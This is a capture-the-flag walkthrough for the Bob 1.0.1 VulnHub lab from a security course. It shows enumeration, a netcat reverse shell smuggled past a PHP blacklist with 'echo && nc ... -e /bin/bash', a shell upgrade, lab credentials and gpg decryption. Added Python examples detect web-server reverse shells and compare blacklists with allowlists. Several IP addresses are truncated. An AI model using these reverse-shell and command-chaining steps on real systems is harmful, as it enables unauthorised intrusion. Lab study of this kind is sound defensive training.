Bob 1.0.1 Vulnhub Walkthrough

Course: Computer and Network Security (ECC4703)
Academic year: 2020/2021

Lab - CTF - Bob 1.0 Walkthrough

Overview

This Capture the Flag exercise is rated Beginner/Intermediate. In the scenario, the Milburg Highschool Server was compromised, causing the school's Window server to be replaced with a Linux server. Your job is to find as many attack vectors as you can and access the flag located at the root of the new Linux server.

Remember your hacking methodology and to enumerate everything!

Hardware and Software Requirements

One virtual install of Kali Linux, updated
One virtual install of the Bob OVA file, available for download here

Administration

For this CTF, I created a desktop directory called bob. I’ll be doing all my work inside of this directory.

Enumeration

The first thing we need to do is find the target. For this, we can use netdiscover.

netdiscover -r 192.168.0.0/24

I identify my target as 192.168.0. We can now run an Nmap scan of the target.

nmap -O -A -sT -sV -p- -T5 192.168.0 -vvv

Nmap found two services, HTTP and SSH, and some interesting files.

Searchsploit comes up negative.

We run dirb and nikto to see if anything pops up. Both provide the same results.

dirb 192.168.


HTTP is the low-hanging fruit and possibly our best source for an attack vector. As with all web servers, the robots.txt file is always a source of interest: it lists the web pages the site owner does not want search engines to catalog.

We have two HTML files, lat_memo and passwords.

192.168.0.27/lat_memo

192.168.0/passwords.html


The next page is the dev_shell page. This is going to be our attack vector. Enumerate the page and check out the source code.


Set the payload as linux/x86/shell/reverse_tcp

set payload linux/x86/shell/reverse_tcp

Set the payload options. The LHOST will use the IP address of our Kali machine.

show options

I type in the run command, and I have the listener up and running.

At the target's PHP shell, I type:

echo && nc 192.168.0 4444 -e /bin/bash

Back at the Metasploit terminal, I now have a basic shell.
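From the defender's side, the sequence above (a web server process spawning a shell, which spawns netcat with `-e`, which spawns bash) is a recognisable process-tree pattern. The following is an added example, not part of the original walkthrough or the Bob VM: it walks a constructed process snapshot, much like one taken from `ps -eo pid,ppid,user,comm,args`, and flags shells and network tools running as a web-server account underneath a web-server parent. The user and program names, and the sample processes (including the 192.168.0.10 listener address), are assumptions made up for the demonstration.

```python
from dataclasses import dataclass

# One row of a process snapshot (pid, ppid, owning user, short name, full command line).
@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    cmdline: str

# Accounts that a web server typically runs as, and the server binaries themselves.
# These sets are assumptions; tune them to the hosts you actually monitor.
WEB_USERS = {"www-data", "apache", "nginx", "http"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
# Programs that a web request handler normally has no business launching.
SHELLS_AND_TOOLS = {"sh", "bash", "dash", "nc", "ncat", "netcat",
                    "python", "python3", "perl", "socat"}
NETCATS = {"nc", "ncat", "netcat"}


def ancestry(index, pid):
    """Return the chain of ancestor processes starting at pid, stopping on cycles."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        proc = index[pid]
        chain.append(proc)
        pid = proc.ppid
    return chain


def find_suspicious(procs):
    """Return (pid, reason) for shells/tools owned by a web user under a web server."""
    index = {p.pid: p for p in procs}
    alerts = []
    for p in procs:
        if p.comm not in SHELLS_AND_TOOLS or p.user not in WEB_USERS:
            continue
        if not any(a.comm in WEB_SERVERS for a in ancestry(index, p.ppid)):
            continue
        reason = "shell/tool under web server"
        # netcat's -e executes a program on the connection: the classic reverse-shell tell.
        if p.comm in NETCATS and " -e " in f" {p.cmdline} ":
            reason = "netcat with -e (program execution) under web server"
        alerts.append((p.pid, reason))
    return alerts


# Constructed snapshot: a normal apache2 tree, the reverse-shell chain, and an
# ordinary interactive session for user bob that must not be flagged.
SAMPLE = [
    Proc(1, 0, "root", "systemd", "/sbin/init"),
    Proc(500, 1, "root", "apache2", "/usr/sbin/apache2 -k start"),
    Proc(501, 500, "www-data", "apache2", "/usr/sbin/apache2 -k start"),
    Proc(620, 501, "www-data", "sh", "sh -c echo && nc 192.168.0.10 4444 -e /bin/bash"),
    Proc(621, 620, "www-data", "nc", "nc 192.168.0.10 4444 -e /bin/bash"),
    Proc(622, 621, "www-data", "bash", "/bin/bash"),
    Proc(700, 1, "bob", "bash", "-bash"),
    Proc(701, 700, "bob", "python3", "python3 script.py"),
]

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE):
        print(f"pid {pid}: {reason}")
```

The check keys on the ancestry rather than the immediate parent, so it still fires when the web server hands off through `sh -c` or PHP before the shell appears, and bob's own bash and python3 processes are ignored because neither the owner nor the parent chain belongs to the web server.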

Next, we use our tried and true Python code to give us an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Let’s enumerate what we have so far by listing the contents of the current directory.

Let’s cat out the file.


We have discovered the credentials for two of the four individuals found on the system.

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M

Bob has a documents folder, and inside we find a login.txt

The secret directory is of interest, so I change location over to it and list its contents.

We find another directory named, Keep_Out. We change location and list the contents.


We find another directory entitled Not_Porn. I change directory and list the contents.

We have another directory named No_Lookie_in_Here. I change directory and list the contents.

Here we find a script named notes. I cat out the contents.


More password information. We now have the following sets of credentials:

elliot:theadminisdumb
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M

Seb has nothing to offer, so we can return our attention to the notes file.


The first letter of each line spells out the word HARPOCRATES. Harpocrates was the Greek god of silence, secrets, and confidentiality.

We next need to decrypt the login.txt discovered earlier in bob’s document directory. We change location back to bob’s documents and run the following command:

gpg --passphrase HARPOCRATES -d login.txt

We have the admin’s credentials, so we can log on as bob using SSH.

I check to see what sudo permissions bob has.


Summary

A lot of good stuff going on with this one. The PHP dev page was locked down with a blacklist of disallowed commands, but we saw how to get around that roadblock. We also learned how to create yet another reverse shell and upgrade it to a more interactive shell using Metasploit.
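The blacklist lesson in the summary is worth seeing in code. The following is an added example, not the Bob VM's PHP dev_shell code (which the page does not show): a fragile blacklist check that inspects only the first word of the input is placed beside an allowlist dispatcher that maps a fixed set of verbs to fixed argument vectors and runs them without a shell, so operators like `&&` have nothing to act on. The blocked and allowed command names are assumptions chosen for the demonstration, and 192.168.0.10 is a made-up listener address.

```python
import shlex
import subprocess

# Assumed blacklist for the demonstration; the real dev_shell list is not on the page.
BLOCKED_COMMANDS = {"nc", "netcat", "bash", "sh", "python", "perl", "wget", "curl"}

# Allowlist: each verb maps to a fixed argv. No user-controlled text reaches a shell.
ALLOWED_COMMANDS = {
    "id": ["id"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
    "list-www": ["ls", "-l", "/var/www/html"],
}


def blacklist_allows(user_input: str) -> bool:
    """The weak pattern: refuse only when the first word is a known-bad name.

    Whatever follows a harmless first command is never examined, so a chained
    command such as the walkthrough's `echo && nc ...` is not stopped by it.
    """
    words = user_input.strip().split()
    if not words:
        return False
    return words[0] not in BLOCKED_COMMANDS


def allowlist_argv(user_input: str):
    """Return the fixed argv for a recognised verb, or None for anything else.

    The input must tokenise to exactly one word that is a key of ALLOWED_COMMANDS;
    `&&`, `;` and `|` simply make the input unrecognised, and the command is run
    without a shell anyway.
    """
    try:
        tokens = shlex.split(user_input)
    except ValueError:          # unbalanced quotes and similar malformed input
        return None
    if len(tokens) != 1:
        return None
    return ALLOWED_COMMANDS.get(tokens[0])


def run_allowed(user_input: str) -> str:
    """Execute an allowlisted verb with argv (no shell) and return its stdout."""
    argv = allowlist_argv(user_input)
    if argv is None:
        raise ValueError("command not permitted: %r" % user_input)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return completed.stdout


if __name__ == "__main__":
    chained = "echo && nc 192.168.0.10 4444 -e /bin/bash"
    print("blacklist lets the chained command through:", blacklist_allows(chained))
    print("allowlist resolves it to:", allowlist_argv(chained))
    print("allowlist resolves 'id' to:", allowlist_argv("id"))
```

The design point is that the allowlist never tries to recognise bad input; it only recognises a handful of good inputs and refuses everything else, which is the property a blacklist cannot provide no matter how many names are added to it.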


© 2018 syberoffense.com All Rights Reserved